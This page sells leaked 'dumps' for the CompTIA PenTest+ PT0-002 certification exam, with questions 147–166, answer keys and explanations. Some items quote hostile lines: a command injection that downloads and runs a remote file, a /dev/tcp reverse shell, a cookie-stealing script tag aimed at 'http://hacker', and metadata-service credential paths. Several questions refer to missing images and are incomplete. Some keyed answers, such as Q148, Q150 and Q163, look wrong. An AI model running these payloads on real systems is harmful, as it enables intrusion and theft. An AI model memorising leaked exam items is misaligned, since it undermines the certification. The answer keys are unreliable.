Pass CompTIA PT0-002 exam Dumps 100 Pass Guarantee With Latest Demo [Q147-Q166]



The PT0-002 PDF Dumps: Greatest for the CompTIA Exam Study Guide!

NEW QUESTION # 147
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Burp Suite and DIRB
  • B. Nmap and OWASP ZAP
  • C. Hydra and crunch
  • D. Netcat and cURL

Answer: A


NEW QUESTION # 148
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • B. The reverse-engineering team may have a history of selling exploits to third parties.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team will be given access to source code for analysis.

Answer: D


NEW QUESTION # 149
A penetration tester performs the following command:
curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option A
  • B. Option B
  • C. Option D
  • D. Option C

Answer: A

Explanation:
Reference: https://research.securitum.com/http-2-protocol-it-is-faster-but-is-it-also-safer/


NEW QUESTION # 150
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

  • A. dig
  • B. tcpdump
  • C. Scapy
  • D. Socat

Answer: D


NEW QUESTION # 151
In Java and C/C++, variable initialization is critical because:

  • A. the compiler will assign null to the variable, which will cause warnings and errors.
  • B. the variable will not have an object type assigned to it.
  • C. the unknown value, when used later, will cause unexpected behavior.
  • D. the initial state of the variable creates a race condition.

Answer: C

Explanation:
Variable initialization is the process of assigning a value to a variable at the time of declaration. In Java and C/C++, variable initialization is critical because if a variable is not initialized, it may contain a garbage value that is unpredictable and may lead to erroneous results or runtime errors when the variable is used later in the program. For example, if a variable is used in a mathematical expression or a conditional statement, the outcome may depend on the value of the variable. If the variable is not initialized, the outcome may differ each time the program is run, or the program may crash due to an invalid operation. Therefore, it is good practice to always initialize variables before using them, or to check that they have been initialized before using them. Reference:
* Different Ways to Initialize a Variable in C++, GeeksforGeeks article by Anshul Aggarwal
* Static variable initialization?, Stack Overflow answer by Paweł Hajdan
* A Guide to Java Initialization, Baeldung article by Eugen Paraschiv


NEW QUESTION # 152
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. powershell -exec bypass -f \\10.10.51.50\9891
  • B. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
  • C. wget 10.10.51.50:9891/exploit
  • D. nc 10.10.51.50 9891 < exploit

Answer: C

Explanation:
Reference: https://www.redhat.com/sysadmin/simple-http-server


NEW QUESTION # 153
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. taskkill /IM "apache" /F
  • B. grep -v apache ~/.bash_history > ~/.bash_history
  • C. chmod 600 /tmp/apache
  • D. rm -rf /tmp/apache

Answer: D

Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.


NEW QUESTION # 154
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

  • A. Kismet
  • B. Wifite
  • C. Wireshark
  • D. Aircrack-ng

Answer: D

Explanation:
Aircrack-ng is a suite of tools that allows the penetration tester to test the effectiveness of the wireless IDS solutions by performing various attacks on wireless networks, such as cracking WEP and WPA keys, capturing and injecting packets, deauthenticating clients, or creating fake access points. Aircrack-ng can also generate different types of traffic and signatures that can trigger the wireless IDS alerts or responses, such as ARP requests, EAPOL frames, or beacon frames.
Reference: https://purplesec.us/perform-wireless-penetration-test/


NEW QUESTION # 155
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Web-application firewall
  • B. Input validation
  • C. Parameterized queries
  • D. Output encoding
  • E. Session tokens
  • F. Base64 encoding

Answer: B,D

Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page.


NEW QUESTION # 156
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Create an encrypted tunnel.
  • C. Attempt to flood open ports.
  • D. Listen for a reverse shell.

Answer: A

Explanation:
The script will perform a port scan on the target IP address, looking for open ports on a list of common ports.
A port scan is a technique that probes a network or a system for open ports, which can reveal potential vulnerabilities or services running on the host.


NEW QUESTION # 157
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

  • A. Contact the client immediately.
  • B. Note this finding for inclusion in the final report.
  • C. Investigate the high numbered port connections.
  • D. Close the reverse shell the tester is using.

Answer: C

Explanation:
The image shows the output of the netstat -antu command, which displays active internet connections for the TCP and UDP protocols. The output shows that there are four established TCP connections and two listening UDP connections on the host. The established TCP connections have high numbered ports as their local addresses, such as 49152, 49153, 49154, and 49155. These ports are in the range of ephemeral ports, which are dynamically assigned by the operating system for temporary use by applications or processes. The foreign addresses of these connections are also high numbered ports, such as 4433, 4434, 4435, and 4436. These ports are not well-known or registered ports for any common service or protocol. The combination of high numbered ports for both local and foreign addresses suggests that these connections are suspicious and may indicate a backdoor or a covert channel on the host. Therefore, the penetration tester should investigate these connections next to determine their nature and purpose. The other options are not appropriate actions for the penetration tester at this stage.


NEW QUESTION # 158
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

  • A. ssh 127.0.0.1 5555
  • B. nc 10.10.1.2
  • C. ssh 10.10.1.2
  • D. nc 127.0.0.1 5555

Answer: D


NEW QUESTION # 159
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

  • A. Credential harvesting
  • B. Metadata service attack
  • C. Resource exhaustion
  • D. Container escape techniques

Answer: B

Explanation:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.


NEW QUESTION # 160
A penetration tester wrote the following script on a compromised system:
#!/bin/bash
# Third octet of the /24 to sweep and the TCP ports to check on each host
network='10.100.100'
ports='22 23 80 443'
# Brace expansion must not contain spaces: {1..254} yields 1 2 ... 254
for x in {1..254};
do (nc -zv $network.$x $ports );
done
Which of the following would explain using this script instead of another tool?

  • A. The penetration tester wanted to persist this script to run on reboot.
  • B. The configuration required the penetration tester to not utilize additional files.
  • C. The Bash script will provide more thorough output.
  • D. The typical tools could not be used against Windows systems.

Answer: B


NEW QUESTION # 161
Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?

  • A. Non-disclosure agreement
  • B. Business associate agreement
  • C. Executive summary
  • D. Assessment scope and methodologies

Answer: D

Explanation:
The assessment scope and methodologies document defines the objectives, boundaries, rules of engagement, and expected outcomes of a penetration testing engagement. It also specifies the roles and responsibilities of the testers and the clients, as well as the communication channels and escalation procedures. This document can help determine who is at fault for a temporary outage that occurred during a penetration test, as it can clarify whether the outage was within the agreed scope and methodologies, or whether it was caused by a violation of the rules of engagement or a lack of coordination. Reference:
* CompTIA PenTest+ Certification Exam Objectives, Domain 1.0 Planning and Scoping, Objective 1.1: Given a scenario, explain the importance of scoping an engagement properly.
* The Official CompTIA PenTest+ Instructor and Student Guides (PT0-002), Lesson 1: Planning and Scoping Penetration Tests, Topic 1.1: Introduction to Penetration Testing Concepts, Topic 1.2: The Penetration Testing Process, Topic 1.3: Planning and Scoping Penetration Tests.


NEW QUESTION # 162
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

  • A. See explanation below

Answer: A

Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host


NEW QUESTION # 163
A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

  • A. Nmap -p 445 -n -T4 -open 172.21.0.0/16
  • B. Nmap -p 445 -max -sT 172. 21.0.0/16
  • C. Nmap -sV --script=smb* 172.21.0.0/16
  • D. Nmap -s 445 -Pn -T5 172.21.0.0/16

Answer: C

Explanation:
The best option when stealth is not a concern and the task is time sensitive is to use the command: Nmap -sV --script=smb* 172.21.0.0/16. This command uses version detection and the SMB scripts to scan for port 445 on the given IP range. The -sV option causes Nmap to detect the version of the services running on the ports, which is helpful for identifying vulnerabilities, and the --script=smb* option causes Nmap to run all of the SMB-related scripts. The -T4 option can be added to speed up the scan, as it selects a more aggressive timing template.


NEW QUESTION # 164
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

  • A. Successful exploits
  • B. Bandwidth limitations
  • C. Application failures
  • D. Patch installations

Answer: A


NEW QUESTION # 165
A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.
INSTRUCTIONS
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Answer:

Explanation:


NEW QUESTION # 166
......

Read Online PT0-002 Test Practice Test Questions Exam Dumps: https://www.examdiscuss.com/CompTIA/exam/PT0-002/

Easily To Pass New PT0-002 Premium Exam: https://drive.google.com/open?id=1l7EBiGiuNtdTZ79E9C5DOBIl1QUYr90d
